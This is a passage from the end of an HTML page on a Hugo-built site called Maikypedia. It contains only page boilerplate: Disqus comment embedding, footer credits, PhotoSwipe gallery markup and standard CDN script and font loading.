        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
